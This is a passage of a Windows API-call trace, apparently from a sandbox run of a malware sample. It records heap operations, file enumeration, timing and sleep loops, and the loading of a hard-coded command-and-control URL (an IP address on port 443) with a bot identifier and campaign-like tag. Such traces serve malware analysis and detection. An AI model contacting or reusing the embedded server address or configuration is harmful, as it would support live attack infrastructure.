Size=0x14) returned 0x6360a0 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360a0, Size=0x29) returned 0x613950 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636160 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636200 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636200, Size=0x2b) returned 0x613bc0 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x16) returned 0x636060 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x16) returned 0x6360c0 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360c0, Size=0x2d) returned 0x613b90 [0181.509] GetProcessHeap () returned 0x5f0000 [0181.509] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x6363a0 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x17) returned 0x636220 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636220, Size=0x2f) returned 0x613920 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x636260 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x43) returned 0x620820 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x22) returned 0x613710 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613710, Size=0x45) returned 0x620190 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x23) returned 0x613ad0 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613ad0, Size=0x59) returned 0x618290 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2d) returned 0x613bf0 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613bf0, Size=0x5b) returned 0x618710 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x6138f0 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2e) returned 0x613b60 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b60, Size=0x5f) returned 0x6180b0 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6180b0 | out: hHeap=0x5f0000) returned 1 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6138f0 | out: hHeap=0x5f0000) returned 1 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618710 | out: hHeap=0x5f0000) returned 1 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618290 | out: hHeap=0x5f0000) returned 1 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620190 | out: hHeap=0x5f0000) returned 1 [0181.510] GetProcessHeap () returned 0x5f0000 [0181.510] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x620820 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613920 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6363a0 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613b90 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636060 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613bc0 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636160 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613950 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6137a0 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x613aa0 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636320 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f860 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f820 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f800 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f850 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f720 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f550 | out: hHeap=0x5f0000) returned 1 [0181.511] GetProcessHeap () returned 0x5f0000 [0181.511] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f670 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x5f0000) returned 1 [0181.512] GetProcessHeap () returned 0x5f0000 [0181.512] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f510 [0181.513] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.513] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd03614eb, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0xd03614eb, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0xd036287a, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="TAS0OY3R.txt", cAlternateFileName="")) returned 0 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f530 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30a) returned 0x624e10 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30a) returned 0x627350 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x61f660 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30a) returned 0x627670 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627350 | out: hHeap=0x5f0000) returned 1 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5d0 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x61f5a0 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30a) returned 0x627350 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40) returned 0x635350 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x30) returned 0x613b30 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x309) returned 0x627990 [0181.513] GetProcessHeap () returned 0x5f0000 [0181.513] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f600 [0181.529] GetProcessHeap () returned 0x5f0000 [0181.529] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f670 [0181.529] GetProcessHeap () returned 0x5f0000 [0181.529] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636140 [0181.529] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0181.530] GetProcessHeap () returned 0x5f0000 [0181.531] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636140 | out: hHeap=0x5f0000) returned 1 [0181.531] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f480 [0181.532] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f590 [0181.532] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f620 [0181.532] lstrlenA (lpString="http://103.239.6.30:443") returned 23 [0181.532] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x6360a0 [0181.532] lstrcpyA (in: lpString1=0x6360a0, lpString2="http://103.239.6.30:443" | out: lpString1="http://103.239.6.30:443") returned="http://103.239.6.30:443" [0181.532] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x636080 [0181.532] lstrlenA (lpString="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned 49 [0181.532] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x32) returned 0x635550 [0181.532] lstrcpyA (in: lpString1=0x635550, lpString2="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93" | out: lpString1="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93") returned="XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93" [0181.532] lstrlenA (lpString="tot153") returned 6 [0181.532] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x7) returned 0x61f490 [0181.532] lstrcpyA (in: lpString1=0x61f490, lpString2="tot153" | out: lpString1="tot153") returned="tot153" [0181.532] GetProcessHeap () returned 0x5f0000 [0181.532] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f510 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f4a0 [0181.533] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="wnsprintfA") returned 0x7ffb262fc9c0 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.533] wnsprintfA (in: pszDest=0x5ceac0, cchDest=13, pszFmt="%d" | out: pszDest="84") returned 2 [0181.533] lstrlenA (lpString="84") returned 2 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f630 [0181.533] lstrcpyA (in: lpString1=0x61f630, lpString2="84" | out: lpString1="84") returned="84" [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f4a0 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x18) returned 0x636260 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5b0 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0x31) returned 0x635590 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.533] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.533] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x19) returned 0x636200 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636200, Size=0x3d) returned 0x635390 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1f) returned 0x6361c0 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5b0 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6361c0, Size=0x3f) returned 0x6357d0 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x20) returned 0x6360c0 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360c0, Size=0xa1) returned 0x625130 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x51) returned 0x6182f0 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f640 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6182f0, Size=0xa3) returned 0x625ca0 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x52) returned 0x618110 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618110, Size=0xa7) returned 0x625d60 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.534] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x54) returned 0x618bf0 [0181.534] GetProcessHeap () returned 0x5f0000 [0181.535] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f640 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618bf0, Size=0xa9) returned 0x6282c0 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d60 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625ca0 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625130 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6357d0 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635390 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635590 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635550 | out: hHeap=0x5f0000) returned 1 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1d) returned 0x636260 [0181.535] GetProcessHeap () returned 0x5f0000 [0181.535] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f4a0 [0181.536] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.536] GetProcessHeap () returned 0x5f0000 [0181.536] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.536] GetTickCount () returned 0xe96e2d [0181.536] GetProcessHeap () returned 0x5f0000 [0181.536] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f630 [0181.536] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.536] GetProcessHeap () returned 0x5f0000 [0181.536] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.536] Sleep (dwMilliseconds=0x0) [0181.541] GetProcessHeap () returned 0x5f0000 [0181.541] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f5b0 [0181.541] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.541] GetProcessHeap () returned 0x5f0000 [0181.541] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.541] GetTickCount () returned 0xe96e3d [0181.541] GetProcessHeap () returned 0x5f0000 [0181.541] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f580 [0181.541] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.541] GetProcessHeap () returned 0x5f0000 [0181.541] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.542] Sleep (dwMilliseconds=0x3) [0181.545] GetProcessHeap () returned 0x5f0000 [0181.545] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f560 [0181.545] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.545] GetProcessHeap () returned 0x5f0000 [0181.545] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.545] GetTickCount () returned 0xe96e3d [0181.545] GetProcessHeap () returned 0x5f0000 [0181.545] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f520 [0181.545] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.545] GetProcessHeap () returned 0x5f0000 [0181.545] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.545] Sleep (dwMilliseconds=0x6) [0181.552] GetProcessHeap () returned 0x5f0000 [0181.552] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f520 [0181.552] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.552] GetProcessHeap () returned 0x5f0000 [0181.552] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.552] GetTickCount () returned 0xe96e3d [0181.552] GetProcessHeap () returned 0x5f0000 [0181.552] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f630 [0181.552] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.553] GetProcessHeap () returned 0x5f0000 [0181.553] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.553] Sleep (dwMilliseconds=0x9) [0181.562] GetProcessHeap () returned 0x5f0000 [0181.562] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f520 [0181.562] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.563] GetProcessHeap () returned 0x5f0000 [0181.563] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.563] GetTickCount () returned 0xe96e4d [0181.563] GetProcessHeap () returned 0x5f0000 [0181.563] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f520 [0181.563] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0181.563] GetProcessHeap () returned 0x5f0000 [0181.563] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.563] Sleep (dwMilliseconds=0xc) [0181.579] GetProcessHeap () returned 0x5f0000 [0181.579] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f540 [0181.579] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0181.579] GetProcessHeap () returned 0x5f0000 [0181.579] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.579] GetTickCount () returned 0xe96e5c [0181.579] GetProcessHeap () returned 0x5f0000 [0181.579] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x61f520 [0181.580] GetProcAddress 